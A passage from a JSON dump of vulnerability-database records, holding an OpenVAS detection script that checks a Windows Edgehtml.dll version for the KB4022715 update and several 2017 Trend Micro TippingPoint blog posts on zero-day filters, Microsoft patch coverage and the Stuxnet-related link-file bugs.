"CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310810903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022715)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810903\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-0215\", \"CVE-2017-0216\", \"CVE-2017-0218\",\n \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\", \"CVE-2017-8476\",\n \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0284\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8496\", \"CVE-2017-8497\",\n \"CVE-2017-8498\", \"CVE-2017-8504\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8515\",\n \"CVE-2017-8517\", \"CVE-2017-0173\", \"CVE-2017-0193\", \"CVE-2017-8473\",\n \"CVE-2017-8474\", \"CVE-2017-8527\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8576\", \"CVE-2017-8518\");\n script_bugtraq_id(98848, 98849, 98926, 98928, 98930, 98879, 98896, 98897, 98898,\n 98885, 98853, 98903, 98953, 98863, 98819, 98920, 98854, 98845,\n 98820, 98821, 98918, 98914, 98856, 98857, 98862, 98824, 98922,\n 98923, 98858, 98859, 98826, 98932, 98954, 98955, 98929, 98835,\n 98836, 98847, 98860, 98940, 98837, 98904, 98839, 98865, 98840,\n 98867, 98869, 98870, 98884, 98901, 98887, 98850, 98855, 98880,\n 98882, 98886, 98892, 98900, 98818, 98843, 98844, 98846, 98833,\n 98895, 98873, 98878, 98852, 98902, 98933);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 08:44:33 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022715)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way the Microsoft Edge JavaScript scripting engine handles objects\n in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Secure Kernel Mode fails to properly handle objects in memory.\n\n - Microsoft Edge Fetch API incorrectly handles a filtered response type.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Microsoft scripting engines do not properly handle objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n For more information please check the Reference URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n obtain sensitive information to further compromise the user's system and to\n bypass security.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022715\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1355\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1355\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-07-11T00:19:10", "description": "\n\nIt has been quoted by Albert Einstein, Benjamin Franklin, and others that insanity is \u201cdoing the same thing over and over again and expecting different results.\u201d I could say that in our world of cyber security, despite all the headlines about data breaches and ransomware, there is no \u201cinsanity.\u201d Products we used 25 years ago probably can\u2019t protect against the latest malware. Someone will reverse-engineer someone\u2019s code and ultimately figure out how to evade a product\u2019s protection mechanisms for detecting or blocking an attack. Entire segments of the cyber security industry exist because there is no insanity. Those who create malware or tools that exploit bugs don\u2019t do the exact same thing over and over again. Once we\u2019ve figured them out, they adjust, and then we adjust by making our products smarter \u2013 until the cycle starts again.\n\nWhen Stuxnet hit in 2010, it made headlines as a new kind of attack with massive geopolitical consequences. Microsoft released several different security patches in response, including MS10-046, to address the vulnerability in link files. Now, with the WikiLeaks documents exposure, it appears that a tool called \u201cEZCheese\u201d exploited a similar bug in link files until 2015. That tool change resulted from a set of bugs discovered through the Zero Day Initiative program that showed the original MS10-046 patch had failed. This forced a change of operational tactics to what was then an \u201cunknown link file vulnerability\u201d in Microsoft, which was likely corrected with the release of CVE-2017-8464. According to the WikiLeaks released documents, both EZCheese and its successor Brutal Kangaroo were designed to attack air-gapped networks similar to Stuxnet. You can learn more on Brutal Kangaroo and the impact the Zero Day Initiative has had on the industry by reading Brian Gorenc\u2019s commentary on his blog: [The Real-World Impact of Bug Bounties and Vulnerability Research](<http://blog.trendmicro.com/real-world-impact-bug-bounties-vulnerability-research/>).\n\n**Zero-Day Filters**\n\nThere are 23 new zero-day filters covering six vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (3)_**\n\n| \n\n * 28916: ZDI-CAN-4887: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28917: ZDI-CAN-4895: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28924: ZDI-CAN-4756: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Foxit (1)_**\n\n| \n\n * 28921: ZDI-CAN-4518: Zero Day Initiative Vulnerability (Foxit Reader)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (11)_**\n\n| \n\n * 28727: HTTPS: HPE Network Automation PermissionFilter Authentication Bypass Vulnerability (ZDI-17-332)\n * 28906: ZDI-CAN-4870: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28907: ZDI-CAN-4871: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28908: ZDI-CAN-4872: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28909: ZDI-CAN-4873: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28910: ZDI-CAN-4874: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28911: ZDI-CAN-4875: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28912: ZDI-CAN-4876: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28913: ZDI-CAN-4877: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28914: ZDI-CAN-4878: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)\n * 28915: ZDI-CAN-4880: Zero Day Initiative Vulnerability (Hewlett Packard Enterprise Intelligent Management)**_ _** \n---|--- \n| \n \n**_Microsoft (6)_**\n\n| \n\n * 28897: ZDI-CAN-4777: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 28918: ZDI-CAN-4886: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28919: ZDI-CAN-4888: Zero Day Initiative Vulnerability (Microsoft Edge)\n * 28925: ZDI-CAN-4894: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28981: ZDI-CAN-4910: Zero Day Initiative Vulnerability (Microsoft Chakra)\n * 28982: ZDI-CAN-4884: Zero Day Initiative Vulnerability (Microsoft Edge)**_ _** \n---|--- \n| \n \n**_Schneider Electric (1)_**\n\n| \n\n * 28920: HTTP: Schneider Electric U.motion Builder loadtemplate.php SQL Injection Vulnerability (ZDI-17-374)**_ _** \n---|--- \n| \n \n**_Trend Micro (1)_**\n\n| \n\n * 28900: HTTPS: Trend Micro InterScan Web Security delete_pac_files Command Injection (ZDI-17-229)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-26-2017/>).", "cvss3": {}, "published": "2017-07-07T15:45:09", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 3, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2017-07-07T15:45:09", "id": "TRENDMICROBLOG:6AD718FC3C384CF6470A9D6815A565D3", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-06T18:18:08", "description": "\n\nRunning the world\u2019s largest vendor agnostic bug bounty program has afforded us the unique opportunity to purchase bugs of all varieties. The submissions to the Zero Day Initiative (ZDI) program range in severity from slightly annoying to hugely impactful. We wouldn\u2019t have it any other way. Generally speaking, the goal of a bug bounty program is to acquire as many bugs as possible. What happens with the bugs once acquired changes depending on the bounty program. At the ZDI, we work not just to kill bugs, which is something we do at a higher rate than other [organizations](<http://newsroom.trendmicro.com/press-release/awards/trend-micro-zero-day-initiative-recognized-leading-vulnerability-research-organ>), but we also aim to disrupt the use of exploits used in advanced attacks.\n\nOf course, detecting and defending against advanced persistent threats provides its own challenges. It\u2019s rare that real-world scenarios are laid bare without a time of crisis response. Recently, the WikiLeaks dump of tools reportedly used by U.S. government agencies offered a prime example of the ZDI program altering attack methods. In fact, if the data provided by WikiLeaks is to be believed, the Central Intelligence Agency was forced to change their operational toolset for exploiting targets based on actions taken by the ZDI.\n\nIn 2010, the world was introduced to the Stuxnet virus after it caused substantial damage to centrifuges in the Iranian nuclear program. At its core, Stuxnet had three parts: a rootkit to hide itself, a worm to execute the main payload of its attack, and a link file that automatically executed to spread copies of the worm. Microsoft released several different security patches in response, including [MS10-046](<https://technet.microsoft.com/en-us/library/security/ms10-046.aspx>), to address the vulnerability in link files. The patch enabled a whitelist check to ensure only approved files could be used, and many thought the implementation succeeded. However, according to the documents published on WikiLeaks, a tool called \u201cEZCheese\u201d exploited a similar bug in link files until 2015. That change resulted from a set of bugs coming through the [ZDI program](<http://www.zerodayinitiative.com/advisories/ZDI-15-086/>) that showed the MS10-046 patch had [failed](<https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WVQScdPytgc>). This forced a change of operational tactics to what was then an \u201cunknown link file vulnerability (Lachesis/RiverJack) related to the library-ms functionality of the operating system.\u201d Although not explicitly stated by Microsoft, this other link file bug was likely corrected with the release of [CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>).\n\nAccording to the released documents, both EZCheese and its successor Brutal Kangaroo were designed to attack air-gapped networks similar to Stuxnet. What some may not realize is that the link file could also be hosted on a remote drive viewable by the target.\n\nWhen the ZDI acquires a bug, it isn\u2019t just reported to the vendor for remediation. Information about the bug is provided to Digital Vaccine\u00ae Labs (DVLabs) within Trend Micro. They produce a DV filter for the vulnerability that allows TippingPoint customers to protect themselves while the vendor develops a patch for broader release. And yes, after deploying this filter (Digital Vaccine Filter 19340), hits were seen in Europe, South America, and Singapore. While it\u2019s impossible to know the intent or full circumstances surrounding these filters being triggered, the low quantity indicates these were likely targeted attacks.\n\nEarlier dumps from ShadowBrokers show this isn\u2019t the first case of this happening. The vulnerability used by the exploit referred to as \u201cEwok Frenzy\u201d was submitted to the ZDI program back in [2007](<http://www.zerodayinitiative.com/advisories/ZDI-07-011/>). Even though a patch was made available for the exploit, it was reportedly used for almost a decade after our initial disclosure. Bug bounties show their value when they successfully kill vulnerabilities. Without a doubt, the ZDI program kills bugs. In fact, we\u2019ve released 452 advisories this year (as of July 5) with 413 more in our upcoming queue. Each one represents a bug exposed to the light. In some cases, the exploit techniques required to exploit a bug can also be filtered. For example, another vulnerability listed in the documents, EasyBee, worked in the same manner as Ewok Frenzy, so the implemented DV filter covered both attacks.\n\nYou can question the veracity of these dumps or whether these exploits were ever actually in the wild, but the scramble by vendors to produce patches has been undeniable. The dumps show adversaries have a complexity and sophistication that requires constant vigilance from network defenders. It also shows how dedicated vulnerability research combined with a world-class bug bounty program increases security for everyone by changing the attack surface. While it\u2019s true there is a difference between zero-day vulnerabilities and zero-day attacks, the value of having protection against bugs prior to their disclosure can\u2019t be measured. The number of software bugs disclosed globally continues to increase year after year. The Zero Day Initiative will continue acquiring and researching zero-day vulnerabilities and working with vendors to increase the overall security posture of their products. We might not ever eliminate all government sponsored, marsupial-based exploits, but we sure can make it harder on them.", "cvss3": {}, "published": "2017-07-06T16:31:43", "title": "The Real-World Impact of Bug Bounties and Vulnerability Research", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-07-06T16:31:43", "id": "TRENDMICROBLOG:69233FAF477D3FFBB70EAF6FDC954DB3", "href": "http://blog.trendmicro.com/real-world-impact-bug-bounties-vulnerability-research/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-15T11:18:24", "description": "\n\nBefore the world of laptops, tablets and smart phones, some of us had to use paper-based solutions to keep track of our calendars and to-do lists. I used a Franklin Planner, where I kept track of my calendar as well as my never-ending to-do list. The Franklin Planner used the \u201cABC\u201d system to help you prioritize your tasks. If you use Microsoft Outlook, you can see this same approach in the Tasks section where you can assign your items with a high, normal, or low priority.\n\nIf you have a large number of tasks on your plate, it\u2019s a nice and easy way to prioritize what you need to work on first.\n\nNow imagine using a Franklin planner to prioritize thousands of security events in your network every 30 seconds? It\u2019s inconceivable! Even if you have an arsenal of security tools at your disposal, how do you determine what to focus on first? To help our customers make sense of what\u2019s going on in their network, we recently announced [SMS Threat Insights](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/integrated-atp/security-management-system/SB01_Threat_Insights_2017.pdf>), a new feature in our TippingPoint Security Management System (SMS). SMS Threat Insights aggregates threat data from multiple sources and compiles it to help you prioritize security response measures, increase visibility into current and potential threats impacting your network, and provide insight into preemptive protection actions that may have already been taken. You can learn more about SMS Threat Insights from my blog: [Not All Threats Are Created Equal](<http://blog.trendmicro.com/not-threats-created-equal/>). If you want to see SMS Threat Insights in action, get a quick demo [here](<https://www.youtube.com/watch?v=gc4K2JFS86E&t=12s>).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before July 11, 2017. Microsoft released patches for Windows, Internet Explorer, Edge, Office, SharePoint, .NET Framework, Exchange, and HoloLens. A total of 19 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [July 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/7/11/the-july-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0170 | | No Vendor Intelligence Provided \nCVE-2017-0243 | 29051 | \nCVE-2017-8463 | | No Vendor Intelligence Provided \nCVE-2017-8467 | | No Vendor Intelligence Provided \nCVE-2017-8486 | | No Vendor Intelligence Provided \nCVE-2017-8495 | | No Vendor Intelligence Provided \nCVE-2017-8501 | | No Vendor Intelligence Provided \nCVE-2017-8502 | | No Vendor Intelligence Provided \nCVE-2017-8556 | | No Vendor Intelligence Provided \nCVE-2017-8557 | | No Vendor Intelligence Provided \nCVE-2017-8559 | | No Vendor Intelligence Provided \nCVE-2017-8560 | | No Vendor Intelligence Provided \nCVE-2017-8561 | | No Vendor Intelligence Provided \nCVE-2017-8562 | | No Vendor Intelligence Provided \nCVE-2017-8563 | | No Vendor Intelligence Provided \nCVE-2017-8564 | | No Vendor Intelligence Provided \nCVE-2017-8565 | | No Vendor Intelligence Provided \nCVE-2017-8566 | | No Vendor Intelligence Provided \nCVE-2017-8569 | | No Vendor Intelligence Provided \nCVE-2017-8570 | | No Vendor Intelligence Provided \nCVE-2017-8573 | | No Vendor Intelligence Provided \nCVE-2017-8574 | | No Vendor Intelligence Provided \nCVE-2017-8577 | 29054 | \nCVE-2017-8578 | 29055 | \nCVE-2017-8580 | | Insufficient Vendor Information \nCVE-2017-8581 | | No Vendor Intelligence Provided \nCVE-2017-8582 | | No Vendor Intelligence Provided \nCVE-2017-8584 | | No Vendor Intelligence Provided \nCVE-2017-8585 | | No Vendor Intelligence Provided \nCVE-2017-8587 | | No Vendor Intelligence Provided \nCVE-2017-8588 | | No Vendor Intelligence Provided \nCVE-2017-8589 | | No Vendor Intelligence Provided \nCVE-2017-8590 | | No Vendor Intelligence Provided \nCVE-2017-8592 | 29048 | \nCVE-2017-8594 | 29046 | \nCVE-2017-8595 | | No Vendor Intelligence Provided \nCVE-2017-8596 | | No Vendor Intelligence Provided \nCVE-2017-8598 | 29050 | \nCVE-2017-8599 | | No Vendor Intelligence Provided \nCVE-2017-8601 | 29047 | \nCVE-2017-8602 | | No Vendor Intelligence Provided \nCVE-2017-8603 | | No Vendor Intelligence Provided \nCVE-2017-8604 | | No Vendor Intelligence Provided \nCVE-2017-8605 | 29049 | \nCVE-2017-8606 | | No Vendor Intelligence Provided \nCVE-2017-8607 | | No Vendor Intelligence Provided \nCVE-2017-8608 | | No Vendor Intelligence Provided \nCVE-2017-8609 | | No Vendor Intelligence Provided \nCVE-2017-8610 | | No Vendor Intelligence Provided \nCVE-2017-8611 | | No Vendor Intelligence Provided \nCVE-2017-8617 | 29056 | \nCVE-2017-8618 | 29045 | \nCVE-2017-8619 | 29057 | \n \n \n\n**End of Sale/End of Life Announcement for TippingPoint N-Series (S660N and S1400N)**\n\nLast week, we announced the end-of-sale (EOS) and end-of-life (EOL) dates for the TippingPoint N-Series solutions (S660N and S1400N). The last day to order the affected products is September 30, 2017 while quantities last. Customers with active maintenance contracts will continue to receive support from TippingPoint\u2019s Technical Assistance Center (TAC) for five years after the end-of-sale date. Maintenance contracts can continue to be purchased to cover the five years of support following the end-of-sale date, however, they must be purchased during the first two years following the end-of-sale date as described in the table below. Maintenance contracts cannot be extend beyond the end-of-support date.\n\n**_Impacted Product SKUs and Descriptions_**\n\n**Part Number ****(HP/Trend Micro)** | **Device Description** | **End of Sale Date** \n---|---|--- \nJC019A/TPNN0020 | TippingPoint S660N Intrusion Prevention System | September 30, 2017 \nJC020A/TPNN0023 | TippingPoint S1400N Intrusion Prevention System | September 30, 2017 \n \n \n\n**_Product End of Life Dates_**\n\n**Milestone** | **Definition** | **End of Sale Date** \n---|---|--- \nEnd of Sale Announcement | The date on which Trend Micro announces the upcoming end of sale and end of support of a product. | July 7, 2017 \nEnd of Sale (Appliance) | The last date to order a product through Trend Micro point of sale. The product is removed from the price list after this date. | September 30, 2017 \nEnd of Sale (Maintenance Renewals) | The last date to order maintenance renewals. | September 30, 2019 \nEnd of Support | The last date that support calls will be accepted for the affected product. RMA\u2019s will cease after this date. Digital Vaccine and ThreatDV updates will cease for the affected products after this date. | September 30, 2022 \n \n \n\nWe recommend that customers upgrade to the most current TippingPoint security platforms. At the time of this bulletin, the Threat Protection System (TPS) models 440T, 2200T and vTPS are the most comparable models to the 660N and 1400N. Contact your sales representative for more information:\n\n| \n\n * TippingPoint 440T Threat Protection System (TPNN0002)\n * TippingPoint 2200T Threat Protection System (TPNN0005)\n * TippingPoint 2600NX Intrusion Prevention System (TPNN0048)\n * Virtual Threat Protection System (TPTN0060) \n---|--- \n| \n \nCustomers with concerns or questions regarding this issue can contact the Trend Micro TippingPoint Technical Assistance Center (TAC).\n\n**Zero-Day Filters**\n\nThere is one new zero-day filter covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Linksys (1)_**\n\n| \n\n * 29060: ZDI-CAN-4892: Zero Day Initiative Vulnerability (Linksys WVBR0)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/>).", "cvss3": {}, "published": "2017-07-14T12:00:02", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 10, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8501", "CVE-2017-8502", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8570", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8594", "CVE-2017-8560", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8559", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-0243", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8569", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2017-07-14T12:00:02", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-10-2017/", "id": "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-27T11:16:56", "description": "\n\n\u201cWhat can you sit on, sleep on, and brush your teeth with?\u201d This was the question posed to Steve Martin\u2019s character C.D. Bales in the 1987 movie Roxanne. In a modern take of Edmond Rostand's 1897 verse play Cyrano de Bergerac, the movie centers around C.D.\u2019s attempt to win the love of a woman while navigating life with his unusually large nose. When C.D. wonders what the point of the question is, his god sister responds, \u201cThe point is that sometimes the answer is so obvious, you don't even realize it. It's as plain as the nose on your face.\u201d By the way, the answer to the question is so obvious: a chair, a bed, and a toothbrush.\n\nAt the Gartner Security and Risk Summit in Washington, D.C., held earlier this week, I heard a recurring theme across the various sessions I attended. The theme was around the fact that the discipline of patching isn\u2019t where it needs to be. As we witnessed with the recent WannaCry ransomware attack, which utilized vulnerabilities that were disclosed by The Shadow Brokers and subsequently patched by Microsoft, many organizations were still affected because they hadn\u2019t patched their systems. The general guidance given at various sessions: Patch your systems. While the answer is so obvious, it may not be practical for some organizations, especially those with thousands of systems. Our solutions can help through the use of \u201cvirtual patching.\u201d While virtual patching is a term that is now pretty common in the security world, where we stand out is when vulnerabilities haven\u2019t been patched by the vendor. If a vulnerability comes to us via the Zero Day Initiative, we will have protection for our customers ahead of a patch that\u2019s made available by the vendor. This is even more important if a vulnerability is brought to us for a solution that is no longer supported by the vendor. Interestingly enough, with this month\u2019s Microsoft Patch Tuesday, Microsoft has issued SMB patches for Windows XP, which reached its end of support deadline in April 2014. While Microsoft states that doing this is an exception and not the norm, it could create a false \u201csafety net\u201d for those who haven\u2019t upgraded their systems. The precedent that this might set in the future is an answer that isn\u2019t so obvious.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before June 13, 2017. Microsoft released patches for almost 100 new CVEs in Internet Explorer, Edge, Office, Windows, and Skype. A total of 18 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/6/13/the-june-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0173 | | No Vendor Intelligence Provided \nCVE-2017-0193 | | No Vendor Intelligence Provided \nCVE-2017-0215 | 28628 | \nCVE-2017-0216 | | No Vendor Intelligence Provided \nCVE-2017-0218 | | No Vendor Intelligence Provided \nCVE-2017-0219 | | No Vendor Intelligence Provided \nCVE-2017-0260 | | No Vendor Intelligence Provided \nCVE-2017-0282 | | No Vendor Intelligence Provided \nCVE-2017-0283 | | No Vendor Intelligence Provided \nCVE-2017-0284 | | No Vendor Intelligence Provided \nCVE-2017-0285 | | No Vendor Intelligence Provided \nCVE-2017-0286 | | No Vendor Intelligence Provided \nCVE-2017-0287 | | No Vendor Intelligence Provided \nCVE-2017-0288 | | No Vendor Intelligence Provided \nCVE-2017-0289 | | No Vendor Intelligence Provided \nCVE-2017-0291 | | No Vendor Intelligence Provided \nCVE-2017-0292 | | No Vendor Intelligence Provided \nCVE-2017-0294 | | No Vendor Intelligence Provided \nCVE-2017-0295 | | No Vendor Intelligence Provided \nCVE-2017-0296 | | Insufficient Vendor Information \nCVE-2017-0297 | | No Vendor Intelligence Provided \nCVE-2017-0298 | | No Vendor Intelligence Provided \nCVE-2017-0299 | | No Vendor Intelligence Provided \nCVE-2017-0300 | | No Vendor Intelligence Provided \nCVE-2017-8460 | | No Vendor Intelligence Provided \nCVE-2017-8461 | | No Vendor Intelligence Provided \nCVE-2017-8462 | | No Vendor Intelligence Provided \nCVE-2017-8464 | 28614 | \nCVE-2017-8465 | 28616 | \nCVE-2017-8466 | 28618 | \nCVE-2017-8468 | 28620 | \nCVE-2017-8469 | | No 